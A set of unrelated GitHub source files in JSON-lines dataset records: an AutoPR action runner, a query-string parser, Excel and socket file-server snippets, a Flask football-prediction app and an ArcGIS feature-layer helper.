) -> Optional[Inputs]:\n # Get the inputs\n inputs_type = action_type._get_inputs_type()\n if isinstance(None, inputs_type):\n inputs = None\n else:\n if action_inputs is None:\n specified_inputs = {}\n else:\n specified_inputs = action_inputs\n\n input_values = {}\n for input_name, template in specified_inputs:\n # resolve prompt contexts\n if isinstance(template, TransformsInto):\n template = template.transform_from_config(template, context)\n # resolve variable declarations\n elif any(isinstance(template, t) for t in typing.get_args(ValueDeclaration)):\n template = template.render(context)\n # resolve string as template (backwards compatibility, should be removed)\n elif isinstance(template, str):\n template = context.render_nested_template(template)\n\n if isinstance(template, pydantic.BaseModel):\n template = template.dict()\n\n if template is not None:\n input_values[input_name] = template\n\n try:\n inputs = inputs_type(**input_values) # pyright: ignore[reportGeneralTypeIssues]\n except ValidationError as e:\n raise ValueError(f\"Invalid inputs for {action_type.id}:\\n\\n{e}\") from e\n\n return inputs\n\n async def _instantiate_and_run_action(\n self,\n action_type: Type[Action[Inputs, Outputs]],\n action_id: str,\n inputs: Inputs,\n publish_service: PublishService,\n ):\n if inputs is not None:\n formatted_inputs = format_for_publishing(inputs)\n else:\n formatted_inputs = \"None\"\n await publish_service.publish_code_block(\"Inputs\", formatted_inputs, language=\"json\")\n\n # Instantiate the action\n action = self.instantiate_action(\n action_type=action_type,\n publish_service=publish_service,\n )\n\n # Run the action\n try:\n outputs = await action.run(inputs)\n except Exception:\n self.log.exception(f\"Failed to run action {action_id}\")\n await publish_service.publish_code_block(\n heading=\"Error\",\n code=traceback.format_exc(),\n language=\"python\", # FIXME\n # does nice syntax highlighting for tracebacks, but should be made configurable\n )\n await publish_service.end_section(f\"❌ Failed {action_id}\")\n raise\n\n return outputs\n\n async def run_action(\n self,\n action_config: ActionConfig,\n context: ContextDict,\n publish_service: PublishService,\n ) -> ContextDict:\n action_id = action_config.action\n section_title = f\"💧 Running `{action_id}`\"\n await publish_service.start_section(section_title)\n\n action_type = self.actions[action_id]\n\n # Get inputs\n inputs = self.get_action_inputs(action_type, action_config.inputs, context)\n\n # Run action\n outputs = await self._instantiate_and_run_action(\n action_type=action_type,\n action_id=action_id,\n inputs=inputs,\n publish_service=publish_service,\n )\n\n if outputs is not None:\n # Publish raw outputs\n await publish_service.publish_code_block(\n \"Outputs\",\n format_for_publishing(outputs),\n language=\"json\",\n )\n\n # Extract outputs\n new_context = {\n context_key: getattr(outputs, output_name)\n for output_name, context_key in action_config.outputs or {}\n if context_key is not None\n }\n\n if new_context:\n # Publish outputs\n await publish_service.publish_code_block(\n \"New Variables\",\n format_for_publishing(new_context),\n language=\"json\",\n )\n\n # End the section\n if publish_service.sections_stack[-1].title == section_title:\n await publish_service.end_section(f\"💧 Finished running `{action_id}`\")\n else:\n await publish_service.end_section()\n\n return ContextDict(new_context)\n\n async def run_action_iteratively(\n self,\n iter_action_config: IterableActionConfig,\n context: ContextDict,\n publish_service: PublishService,\n ) -> ContextDict:\n action_id = iter_action_config.action\n section_title = f\"💦 Iteratively running `{action_id}`\"\n await publish_service.start_section(section_title)\n\n action_type = self.actions[action_id]\n\n iteration = iter_action_config.iterate\n if isinstance(iteration, int):\n # iterate `iteration` times\n item_name = iter_action_config.as_\n iter_context = context\n coros = []\n for i in range(iteration):\n if item_name is not None:\n iter_context = ContextDict(iter_context | {item_name: i})\n\n # Get inputs\n inputs = self.get_action_inputs(\n action_type, iter_action_config.inputs, iter_context\n )\n\n coros.append(\n self._instantiate_and_run_action(\n action_type=action_type,\n action_id=action_id,\n inputs=inputs,\n publish_service=await publish_service.create_child(f\"💧 Iteration {i+1}\"),\n )\n )\n else: # isinstance(iteration, ContextVarPath)\n # iterate over a list in the context\n list_var = context.get_path(iteration)\n if not isinstance(list_var, Iterable):\n raise ValueError(f\"Expected {iteration} to be an iterable\")\n\n # Get inputs including the list item\n item_name = iter_action_config.as_\n if item_name is None:\n raise ValueError(\"Expected `as` to be specified for action iterating over a list\")\n coros = []\n for item in list_var:\n iter_context = ContextDict(context | {item_name: item})\n inputs = self.get_action_inputs(\n action_type, iter_action_config.inputs, iter_context\n )\n coros.append(\n self._instantiate_and_run_action(\n action_type=action_type,\n action_id=action_id,\n inputs=inputs,\n publish_service=await publish_service.create_child(\n title=f\"💧 Iteration: `{truncate_strings(str(item), length=40)}`\"\n ),\n )\n )\n\n # Gather the action runs\n outputses = await asyncio.gather(*coros)\n\n # Extract outputs\n new_context = {}\n for output_name, context_key in iter_action_config.list_outputs or {}:\n if context_key is None:\n continue\n new_context[context_key] = [getattr(outputs, output_name) for outputs in outputses]\n\n await publish_service.publish_code_block(\n \"Outputs\",\n format_for_publishing(new_context),\n language=\"json\",\n )\n\n # End the section\n if publish_service.sections_stack[-1].title == section_title:\n await publish_service.end_section(f\"💦 Finished iterating `{action_id}`\")\n else:\n await publish_service.end_section()\n\n return ContextDict(new_context)\n","repo_name":"irgolic/AutoPR","sub_path":"autopr/services/action_service.py","file_name":"action_service.py","file_ext":"py","file_size_in_byte":10247,"program_lang":"python","lang":"en","doc_type":"code","stars":1126,"dataset":"github-code","pt":"37"} +{"seq_id":"4277375356","text":"# coding: utf-8\n'''\nQuery string to database query conversion.\n'''\n\nimport re\nimport canvas as cv\n\n_query_string_operators = list()\ndef query_string_operator(regex):\n\tdef register_operator(meth):\n\t\t_query_string_operators.append((regex, meth))\n\t\treturn meth\n\treturn register_operator\n\n@query_string_operator(r'^not\\(([\\w\\s]+)\\)$')\ndef invert_operator(match, column, parse):\n\treturn column != parse(match.group(1))\n\n@query_string_operator(r'^in\\((.*?),(.*?)\\)$')\ndef range_operator(match, column, parse):\n\treturn (\n\t\t(column >= parse(match.group(1))) & \n\t\t(column < parse(match.group(2)))\n\t).grouped\n\ndef query_to_query(model_cls, query_string, default_variant=None):\n\t'''Convert a query string to a canvas ORM query, distrusting the client.'''\n\ttable = model_cls.__table__\n\n\tdef protect_key(key):\n\t\twhile key in table.columns:\n\t\t\tkey = ''.join(('_', key))\n\t\treturn key\n\t#\tDefine the query modifier keys without namespace conflict.\n\tcount_key = protect_key('count')\n\toffset_key = protect_key('offset')\n\torder_key = protect_key('order')\n\tvariant_key = protect_key('variant')\n\n\t#\tPrepare default values.\n\tquery_condition = True\n\tquery_target = model_cls if not default_variant else default_variant(model_cls)\n\tcount = offset = None\n\torder = list()\n\n\t#\tIterate the query string, inspecting each item.\n\tfor key, value in query_string.items():\n\t\t#\tCheck query modifiers.\n\t\tif key == count_key:\n\t\t\ttry:\n\t\t\t\tcount = int(value)\n\t\t\texcept:\n\t\t\t\traise cv.BadRequest('\"%s\" must be an integer'%count_key)\n\t\telif key == offset_key:\n\t\t\ttry:\n\t\t\t\toffset = int(value)\n\t\t\texcept:\n\t\t\t\traise cv.BadRequest('\"%s\" must be an integer'%offset_key)\n\t\telif key == order_key:\n\t\t\tattr, desc = value, True\n\t\t\tmatch = re.match(r'^(\\w+)(?:\\((asc|desc)(?:ending){0,1}\\)){0,1}$', value)\n\t\t\tif match:\n\t\t\t\tattr = match.group(1)\n\t\t\t\tdescending = match.group(2) == 'desc'\n\n\t\t\tif attr not in table.columns:\n\t\t\t\traise cv.BadRequest('Invalid order \"%s\"'%attr)\n\n\t\t\torder.append(getattr(table.columns[attr], 'desc' if descending else 'asc'))\n\t\telif key == variant_key:\n\t\t\tquery_target = getattr(model_cls, value, None)\n\t\t\tif not query_target or not getattr(query_target, '__restquery__', False):\n\t\t\t\traise cv.BadRequest('No query variant \"%s\"'%value)\n\t\t\tquery_target = query_target()\n\t\telse:\n\t\t\tcolumn = table.columns.get(key)\n\t\t\tif not column:\n\t\t\t\traise cv.BadRequest('Invalid key \"%s\"'%key)\n\t\t\t\n\t\t\tdef parse_value(one):\n\t\t\t\tif one == 'null':\n\t\t\t\t\treturn None\n\t\t\t\treturn column.cast(one)\n\t\t\t\n\t\t\tdef parse_one(one):\n\t\t\t\tfor operator in _query_string_operators:\n\t\t\t\t\tmatch = re.match(operator[0], one)\n\t\t\t\t\tif match:\n\t\t\t\t\t\treturn operator[1](match, column, parse_value)\n\t\t\t\treturn column == parse_value(one)\n\n\t\t\tquery_condition = query_condition & parse_one(value)\n\n\treturn query_target, query_condition, order, offset, count","repo_name":"robinsax/canvas-plugin-multirepo","sub_path":"cvpl-restful/restful/ops/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74752651946","text":"# Program to extract number of columns in Python \nimport xlrd \n \nloc = (\"F:/emp.xlsx\") \n \nwb = xlrd.open_workbook(loc) \nsheet = wb.sheet_by_index(0) \n \n# For row 0 and column 0 \nsheet.cell_value(0, 0) \n \n# Extracting number of columns \nprint(sheet.ncols) \n","repo_name":"Shashivardhan3/python","sub_path":"excel module/6 reading no of cols.py","file_name":"6 reading no of cols.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14431138130","text":"import socket;\n\n\n\ndef sendFile2Client(newClientSocket , clientAddr):\n #接收客户端发过来的要下载的文件名\n fileName = newClientSocket.recv(1024).decode(\"utf-8\");\n print(\"客户端(%s)需要下载的文件是 : %s \" % (str(clientAddr), fileName));\n\n fileContent = None;\n #打开文件 , 读取数据\n try:\n f = open(fileName,\"rb\");\n fileContent = f.read();\n f.close();\n except Exception as ret:\n print(\"没有药下载的文件(%s) \" % fileName);\n\n #发送文件的数据给客户端\n newClientSocket.send(fileContent);\n\n\n\ndef execute():\n #1.创建套接字socket\n tcpServerSocket = socket.socket(socket.AF_INET , socket.SOCK_STREAM);\n\n #2.绑定本地信息bind\n tcpServerSocket.bind((\"\",7890));\n\n #3.让默认的套接字由主动变为被动\n tcpServerSocket.listen(128);\n\n\n while True:\n #4.等待客户端的连接 accept\n newClientSocket , clientAddr = tcpServerSocket.accept();\n\n\n #5.发送文件的数据给客户端\n sendFile2Client(newClientSocket,clientAddr);\n\n #6.关闭套接字\n newClientSocket.close();\n tcpServerSocket.close();\n\n\n\nif __name__ == '__main__':\n execute();","repo_name":"ht5678/yzh-learn","sub_path":"demo-python/base/demo/network/tcpFileServer.py","file_name":"tcpFileServer.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41923459990","text":"import csv\nfrom flask import Flask, request, render_template, flash, session, jsonify\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, classification_report, confusion_matrix\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\napp = Flask(__name__)\napp.secret_key = 'your_secret_key_here'\n\n# Fungsi untuk memproses file CSV klasemen\n\n\ndef process_csv_file(file_path):\n data = []\n with open(file_path, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=';')\n headers = next(csvreader)\n for row in csvreader:\n data.append(row)\n return headers, data\n\n# Fungsi untuk memproses file CSV pertandingan\n\n\ndef process_csv_file_match(file_path):\n data = []\n with open(file_path, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=';')\n headers = next(csvreader)\n for row in csvreader:\n data.append(row)\n return headers, data\n\n# Fungsi untuk melakukan prediksi dan menghitung akurasi klasemen\n\n\ndef predict_and_evaluate(file_path, data_input):\n dataset = pd.read_csv(file_path, delimiter=';', header=0)\n dataset = dataset.drop(labels=\"nama_tim\", axis=1)\n\n enc = LabelEncoder()\n dataset['kualitas_pelatih'] = enc.fit_transform(\n dataset['kualitas_pelatih'].values)\n\n attr_dataset = dataset.drop(columns='status')\n cls_dataset = dataset['status']\n\n xtrain, xtest, ytrain, ytest = train_test_split(\n attr_dataset, cls_dataset, test_size=None, random_state=1)\n tree_dataset = DecisionTreeClassifier(random_state=1)\n tree_dataset.fit(xtrain, ytrain)\n\n ypred = tree_dataset.predict(data_input)\n\n # akurasi = accuracy_score(ytest, ypred)\n\n return ypred[0]\n\n\ndef predict_and_evaluate1(file_path):\n dataset = pd.read_csv(file_path, delimiter=';', header=0)\n\n # Menghapus kolom \"nama_tim\"\n dataset = dataset.drop(labels=\"nama_tim\", axis=1)\n\n # Encoding kolom 'kualitas_pelatih'\n enc = LabelEncoder()\n dataset['kualitas_pelatih'] = enc.fit_transform(\n dataset['kualitas_pelatih'].values)\n\n attr_dataset = dataset.drop(columns='status')\n cls_dataset = dataset['status']\n\n xtrain, xtest, ytrain, ytest = train_test_split(\n attr_dataset, cls_dataset, test_size=0.2, random_state=1)\n tree_dataset = DecisionTreeClassifier(random_state=1)\n tree_dataset.fit(xtrain, ytrain)\n\n ypred = tree_dataset.predict(xtest)\n akurasi = accuracy_score(ytest, ypred)\n classification_report_str = classification_report(\n ytest, ypred, zero_division=1)\n\n return akurasi, classification_report_str\n\n# Fungsi untuk melakukan prediksi dan menghitung akurasi pertandingan\n\n\ndef predict_and_evaluate_match(file_path):\n dataset = pd.read_csv(file_path, delimiter=';', header=0)\n\n # Menghapus kolom \"nama_tim\"\n dataset = dataset.drop(columns=\"pertandingan\", axis=1)\n\n attr_dataset = dataset.drop(columns='hasil')\n cls_dataset = dataset['hasil']\n\n xtrain, xtest, ytrain, ytest = train_test_split(\n attr_dataset, cls_dataset, test_size=0.2, random_state=1)\n tree_dataset = DecisionTreeClassifier(criterion='entropy')\n tree_dataset.fit(xtrain, ytrain)\n\n ypred = tree_dataset.predict(xtest)\n akurasi = accuracy_score(ytest, ypred)\n classification_report_str = classification_report(\n ytest, ypred, zero_division=1)\n\n return akurasi, classification_report_str\n# Fungsi untuk proses dataset klasemen\n\n\ndef predict_and_evaluate_match_input(file_path, data_input):\n dataset = pd.read_csv(file_path, delimiter=';', header=0)\n dataset = dataset.drop(labels=\"pertandingan\", axis=1)\n\n attr_dataset = dataset.drop(columns='hasil')\n cls_dataset = dataset['hasil']\n\n xtrain, xtest, ytrain, ytest = train_test_split(\n attr_dataset, cls_dataset, test_size=0.9, random_state=1)\n tree_dataset = DecisionTreeClassifier(random_state=1)\n tree_dataset.fit(xtrain, ytrain)\n\n ypred = tree_dataset.predict(data_input)\n\n # akurasi = accuracy_score(ytest, ypred)\n\n return ypred[0]\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_csv():\n akurasi = 0\n classification_report_str = \"\"\n\n if request.method == 'POST':\n file = request.files['csv_file']\n if file and file.filename.endswith('.csv'):\n filename = file.filename\n file.save(os.path.join('uploads/klasemen', filename))\n flash(f'File {filename} berhasil diunggah.', 'success')\n\n headers, data_rows = process_csv_file(\n os.path.join('uploads/klasemen', filename))\n\n # Prediksi dan evaluasi hasil\n akurasi, classification_report_str = predict_and_evaluate1(\n os.path.join('uploads/klasemen', filename))\n else:\n flash(\n f'File {file.filename} gagal diunggah. File yang diunggah harus berformat .csv.', 'error')\n headers, data_rows = [], []\n else:\n headers, data_rows = [], []\n\n return render_template('index.html', headers=headers, data_rows=data_rows, akurasi=akurasi*100, classification_report_str=classification_report_str)\n\n# Fungsi untuk proses dataset pertandingan\n\n\n@app.route('/prediksi', methods=['GET', 'POST'])\ndef upload_csv_match():\n akurasi = 0\n classification_report_str = \"\"\n\n if request.method == 'POST':\n file = request.files['csv_file']\n if file and file.filename.endswith('.csv'):\n filename = file.filename\n file.save(os.path.join('uploads/pertandingan', filename))\n flash(f'File {filename} berhasil diunggah.', 'success')\n\n headers, data_rows = process_csv_file_match(\n os.path.join('uploads/pertandingan', filename))\n\n # Prediksi dan evaluasi hasil\n akurasi, classification_report_str = predict_and_evaluate_match(\n os.path.join('uploads/pertandingan', filename))\n\n for row in data_rows:\n row[1] = 'Biasa' if row[1] == 0 else (\n 'Rata-Rata' if row[1] == 1 else 'Bagus')\n row[2] = 'Biasa' if row[2] == 0 else (\n 'Rata-Rata' if row[2] == 1 else 'Bagus')\n row[3] = 'Baru Melatih' if row[3] == 0 else (\n 'Berprestasi' if row[3] == 1 else 'Berpengalaman')\n row[4] = 'Baru Melatih' if row[4] == 0 else (\n 'Berprestasi' if row[4] == 1 else 'Berpengalaman')\n row[5] = 'Counter Attack' if row[5] == 0 else (\n 'Long Ball' if row[5] == 1 else ('Build Up' if row[4] == 2 else 'Tiki-Taka'))\n row[6] = 'Counter Attack' if row[6] == 0 else (\n 'Long Ball' if row[6] == 1 else ('Build Up' if row[5] == 2 else 'Tiki-Taka'))\n row[7] = 'Low Block' if row[7] == 0 else ('Man Marking' if row[6] == 1 else (\n 'High Pressing' if row[7] == 2 else 'Offside Trap'))\n row[8] = 'Low Block' if row[8] == 0 else ('Man Marking' if row[7] == 1 else (\n 'High Pressing' if row[8] == 2 else 'Offside Trap'))\n\n else:\n flash(\n f'File {file.filename} gagal diunggah. File yang diunggah harus berformat .csv.', 'error')\n headers, data_rows = [], []\n else:\n headers, data_rows = [], []\n\n return render_template('prediksi.html', headers=headers, data_rows=data_rows, akurasi=akurasi*100, classification_report_str=classification_report_str)\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n # Get the input data from the form\n point_akhir = request.form.get('floatingPoint')\n jumlah_gol = request.form.get('floatingGol')\n jumlah_masuk = request.form.get('floatingBobol')\n rating_tim = request.form.get('floatingRating')\n kualitas_pelatih = request.form.get('floatingPelatih')\n nama_tim = request.form.get('floatingTim')\n\n # Load the uploaded CSV file and preprocess the input data for prediction\n data_input = [[point_akhir, jumlah_gol,\n jumlah_masuk, rating_tim, kualitas_pelatih]]\n\n # # Perform the prediction using the C4.5 algorithm\n prediction_result = predict_and_evaluate(\n os.path.join('uploads/klasemen', 'premierleague.csv'), data_input)\n\n # # Convert the prediction result to the corresponding class name\n if prediction_result == 'ucl':\n kelas = 'Liga Champions (UCL)'\n elif prediction_result == 'uecl':\n kelas = 'Liga Conference (UECL)'\n elif prediction_result == 'degradasi':\n kelas = 'Degradasi'\n elif prediction_result == 'no_europe':\n kelas = 'Tidak Bermain di Turnamen Eropa'\n else:\n kelas = 'Liga Eropa (UEL)'\n\n # # Return the prediction results as JSON\n return jsonify({\n 'prediction_result': kelas,\n 'nama_tim': nama_tim,\n 'floatingPoint': point_akhir,\n 'floatingGol': jumlah_gol,\n 'floatingBobol': jumlah_masuk,\n 'floatingRating': rating_tim,\n 'floatingPelatih': kualitas_pelatih,\n })\n # return render_template('index.html', nama_tim=nama_tim, point_akhir=point_akhir, jumlah_gol=jumlah_gol, jumlah_masuk=jumlah_masuk, rating_tim=rating_tim, kualitas_pelatih=kualitas_pelatih)\n\n\n@app.route('/predict-match', methods=['POST'])\ndef predict_match():\n if request.method == 'POST':\n # Get the input data from the form\n nama_tim_home = request.form.get('floatingTimHome')\n nama_tim_away = request.form.get('floatingTimAway')\n rating_tim_home = request.form.get('floatingRatingTimHome')\n rating_tim_away = request.form.get('floatingRatingTimAway')\n kualitas_pelatih_home = request.form.get(\n 'floatingKualitasPelatihHome')\n kualitas_pelatih_away = request.form.get(\n 'floatingKualitasPelatihAway')\n menyerang_home = request.form.get('floatingMenyerangHome')\n menyerang_away = request.form.get('floatingMenyerangAway')\n bertahan_home = request.form.get('floatingBertahanHome')\n bertahan_away = request.form.get('floatingBertahanAway')\n\n # Load the uploaded CSV file and preprocess the input data for prediction\n data_input = [[rating_tim_home, rating_tim_away, kualitas_pelatih_home,\n kualitas_pelatih_away, menyerang_home, menyerang_away, bertahan_home, bertahan_away]]\n\n # # Perform the prediction using the C4.5 algorithm\n prediction_result = predict_and_evaluate_match_input(\n os.path.join('uploads/pertandingan', 'match-dataset.csv'), data_input)\n\n if prediction_result == 'kalah':\n kelas = 'Kalah'\n elif prediction_result == 'imbang':\n kelas = 'Imbang'\n else:\n kelas = 'Menang'\n\n if rating_tim_home == '0':\n rating_tim_home = 'Biasa'\n elif rating_tim_home == '1':\n rating_tim_home = 'Rata-Rata'\n else:\n rating_tim_home = 'Bagus'\n\n if rating_tim_away == '0':\n rating_tim_away = 'Biasa'\n elif rating_tim_away == '1':\n rating_tim_away = 'Rata-Rata'\n else:\n rating_tim_away = 'Bagus'\n\n if kualitas_pelatih_home == '0':\n kualitas_pelatih_home = 'Baru Melatih'\n elif kualitas_pelatih_home == '1':\n kualitas_pelatih_home = 'Berprestasi'\n else:\n kualitas_pelatih_home = 'Berpengalaman'\n\n if kualitas_pelatih_away == '0':\n kualitas_pelatih_away = 'Baru Melatih'\n elif kualitas_pelatih_away == '1':\n kualitas_pelatih_away = 'Berprestasi'\n else:\n kualitas_pelatih_away = 'Berpengalaman'\n\n if menyerang_home == '0':\n menyerang_home = 'Counter Attack'\n elif menyerang_home == '1':\n menyerang_home = 'Long Ball'\n elif menyerang_home == '2':\n menyerang_home = 'Build Up'\n else:\n menyerang_home = 'Tiki-Taka'\n\n if menyerang_away == '0':\n menyerang_away = 'Counter Attack'\n elif menyerang_away == '1':\n menyerang_away = 'Long Ball'\n elif menyerang_away == '2':\n menyerang_away = 'Build Up'\n else:\n menyerang_away = 'Tiki-Taka'\n\n if bertahan_home == '0':\n bertahan_home = 'Low Block'\n elif bertahan_home == '1':\n bertahan_home = 'Man Marking'\n elif bertahan_home == '2':\n bertahan_home = 'High Pressing'\n else:\n bertahan_home = 'Offside Trap'\n\n if bertahan_away == '0':\n bertahan_away = 'Low Block'\n elif bertahan_away == '1':\n bertahan_away = 'Man Marking'\n elif bertahan_away == '2':\n bertahan_away = 'High Pressing'\n else:\n bertahan_away = 'Offside Trap'\n\n # Return the prediction results as JSON\n return jsonify({\n 'prediction_result': kelas,\n 'nama_tim_home': nama_tim_home,\n 'nama_tim_away': nama_tim_away,\n 'rating_tim_home': rating_tim_home,\n 'rating_tim_away': rating_tim_away,\n 'kualitas_pelatih_home': kualitas_pelatih_home,\n 'kualitas_pelatih_away': kualitas_pelatih_away,\n 'menyerang_home': menyerang_home,\n 'menyerang_away': menyerang_away,\n 'bertahan_home': bertahan_home,\n 'bertahan_away': bertahan_away,\n })\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/prediksi')\ndef prediksi():\n return render_template('prediksi.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ricorizkya/Prediksi-Klasemen-English-Premier-League","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"69840066669","text":"from __future__ import annotations\nimport os\nfrom typing import Union\n\nfrom arcgis.gis import GIS, Item\nfrom arcgis.features import FeatureLayer, Feature\nfrom arcgis.geometry import SpatialReference\n\n\nclass _ReachIdFeatureLayer(FeatureLayer):\n\n @classmethod\n def from_item_id(cls, gis: GIS, item_id: str) -> _ReachIdFeatureLayer:\n url = Item(gis, item_id).layers[0].url\n return cls(url, gis)\n\n @classmethod\n def from_url(cls, gis: GIS, url: str) -> _ReachIdFeatureLayer:\n return cls(url, gis)\n\n def query_by_reach_id(self, reach_id: str, spatial_reference: Union[int, dict, SpatialReference] = {'wkid': 4326}):\n return self.query(f\"reach_id = '{reach_id}'\", out_sr=spatial_reference)\n\n def flush(self) -> dict:\n \"\"\"\n Delete all data!\n :return: Response\n \"\"\"\n # get a list of all OID's\n oid_list = self.query(return_ids_only=True)['objectIds']\n\n # if there are features\n if len(oid_list):\n # convert the list to a comma separated string\n oid_deletes = ','.join([str(v) for v in oid_list])\n\n # delete all the features using the OID string\n return self.edit_features(deletes=oid_deletes)\n\n def update(self, reach):\n\n # get oid of records matching reach_id\n oid_lst = self.query(f\"reach_id = '{reach.reach_id}'\", return_ids_only=True)['objectIds']\n\n # if a feature already exists - hopefully the case, get the oid, add it to the feature, and push it\n if len(oid_lst) > 0:\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n update_feat = reach.as_centroid_feature\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n update_feat = reach.as_feature\n\n update_feat.attributes['OBJECTID'] = oid_lst[0]\n resp = self.edit_features(updates=[update_feat])\n\n # if the feature does not exist, add it\n else:\n resp = self.add_reach(reach)\n\n return resp\n\n def update_attributes_only(self, reach):\n\n # get oid of records matching reach_id\n oid_lst = self.query(f\"reach_id = '{reach.reach_id}'\", return_ids_only=True)['objectIds']\n\n # if a feature already exists - hopefully the case, get the oid, add it to the feature, and push it\n if len(oid_lst) > 0:\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n update_feat = reach.as_centroid_feature\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n update_feat = reach.as_feature\n\n # remove any of the geographic properties from the feature\n for attr in ['extent']:\n del (update_feat.attributes[attr])\n update_feat = Feature(attributes=update_feat.attributes) # gets rid of geometry\n\n update_feat.attributes['OBJECTID'] = oid_lst[0]\n\n # push the update\n resp = self.edit_features(updates=[update_feat])\n\n return resp\n\n else:\n\n return False\n\n def update_stage(self, reach):\n\n # get oid of records matching reach_id\n oid_lst = self.query(f\"reach_id = '{reach.reach_id}'\", return_ids_only=True)['objectIds']\n\n # if a feature already exists - hopefully the case, get the oid, add it to the feature, and push it\n if len(oid_lst) > 0:\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n update_feat = reach.as_centroid_feature\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n update_feat = reach.as_feature\n\n # remove properties not needed, which is most of them\n update_keys = ['gauge_runnable', 'gauge_stage', 'gauge_observation']\n attrs = {k: update_feat.attributes[k] for k in update_feat.attributes.keys() if k in update_keys}\n\n # create new feature without geometry and only needed attributes\n update_feat = Feature(attributes=attrs)\n\n # tack on the object id retrieved initally\n update_feat.attributes['OBJECTID'] = oid_lst[0]\n\n # push the update\n resp = self.edit_features(updates=[update_feat])\n\n return resp\n\n else:\n\n return False\n\n\nclass ReachPointFeatureLayer(_ReachIdFeatureLayer):\n\n def add_reach(self, reach):\n \"\"\"\n Push new reach points to the reach point feature service in bulk.\n :param reach: Reach - Required\n Reach object being pushed to feature service.\n :return: Dictionary response from edit features method.\n \"\"\"\n from .reach import Reach\n\n # check for correct object type\n if type(reach) != Reach:\n raise Exception('Reach to add must be a Reach object instance.')\n\n # TODO: Ensure reach does not already exist\n return self.edit_features(adds=reach.reach_points_as_features)\n\n def _add_reach_point(self, reach_point):\n # add a new reach point to ArcGIS Online\n resp = self.update(adds=[reach_point.as_feature])\n\n # TODO: handle the response\n return None\n\n def update_putin_or_takeout(self, access):\n access_resp = self.query(\n f\"reach_id = '{access.reach_id}' AND point_type = 'access' AND subtype = '{access.subtype}'\",\n return_ids_only=True)['objectIds']\n if len(access_resp):\n oid_access = access_resp[0]\n access_feature = access.as_feature\n access_feature.attributes['OBJECTID'] = oid_access\n return self.edit_features(updates=[access_feature])\n else:\n return self.edit_features(adds=[access.as_feature])\n\n def update_putin(self, access):\n if not access.subtype == 'putin':\n raise Exception('A put-in access point must be provided to update the put-in.')\n return self.update_putin_or_takeout(access)\n\n def update_takeout(self, access):\n if not access.subtype == 'takeout':\n raise Exception('A take-out access point must be provided to update the take-out.')\n return self.update_putin_or_takeout(access)\n\n def _create_reach_point_from_series(self, reach_point):\n from .reach import ReachPoint\n\n # create an access object instance with the required parameters\n access = ReachPoint(reach_point['reach_id'], reach_point['_geometry'], reach_point['type'])\n\n # for the remainder of the fields from the service, populate if matching key in access object\n for key in [val for val in reach_point.keys() if val not in ['reach_id', '_geometry', 'type']]:\n if key in access.keys():\n access[key] = reach_point[key]\n\n return access\n\n def get_putin(self, reach_id):\n\n # get a pandas series from the feature service representing the putin access\n sdf = self.get_putin_sdf(reach_id)\n putin_series = sdf.iloc[0]\n return self._create_reach_point_from_series(putin_series)\n\n def get_takeout(self, reach_id):\n\n # get a pandas series from the feature service representing the putin access\n sdf = self.get_takeout_sdf(reach_id)\n takeout_series = sdf.iloc[0]\n return self._create_reach_point_from_series(takeout_series)\n\n\nclass ReachLineFeatureLayer(_ReachIdFeatureLayer):\n\n def query_by_river_name(self, river_name_search):\n field_name = 'name_river'\n where_list = [\"{} LIKE '%{}%'\".format(field_name, name_part) for name_part in river_name_search.split()]\n where_clause = ' AND '.join(where_list)\n return self.query(where_clause).df\n\n def query_by_section_name(self, section_name_search):\n field_name = 'name_section'\n where_list = [\"{} LIKE '%{}%'\".format(field_name, name_part) for name_part in section_name_search.split()]\n where_clause = ' AND '.join(where_list)\n return self.query(where_clause).df\n\n def add_reach(self, reach):\n \"\"\"\n Push reach to feature service.\n :param reach: Reach - Required\n Reach object being pushed to feature service.\n :return: Dictionary response from edit features method.\n \"\"\"\n from .reach import Reach\n\n # check for correct object type\n if type(reach) != Reach:\n raise Exception('Reach to add must be a Reach object instance.')\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n point_feature = reach.as_centroid_feature\n resp = self.edit_features(adds=[point_feature])\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n line_feature = reach.as_feature\n resp = self.edit_features(adds=[line_feature])\n\n else:\n raise Exception('The feature service geometry type must be either point or polyline.')\n\n return resp\n\n\ndef update_stage(reach_id, line_lyr_id=os.getenv('REACH_LINE_ID'), centroid_lyr_id=os.getenv('REACH_CENTROID_ID')):\n \"\"\"\n Update the reach stage by the id.\n :param reach_id: Reach ID uniquely identifying the reach\n :return: Boolean success or failure.\n \"\"\"\n from .reach import Reach\n reach = Reach.get_from_aw(reach_id)\n for lyr_id in [line_lyr_id, centroid_lyr_id]:\n lyr = ReachFeatureLayer.from_item_id(lyr_id)\n 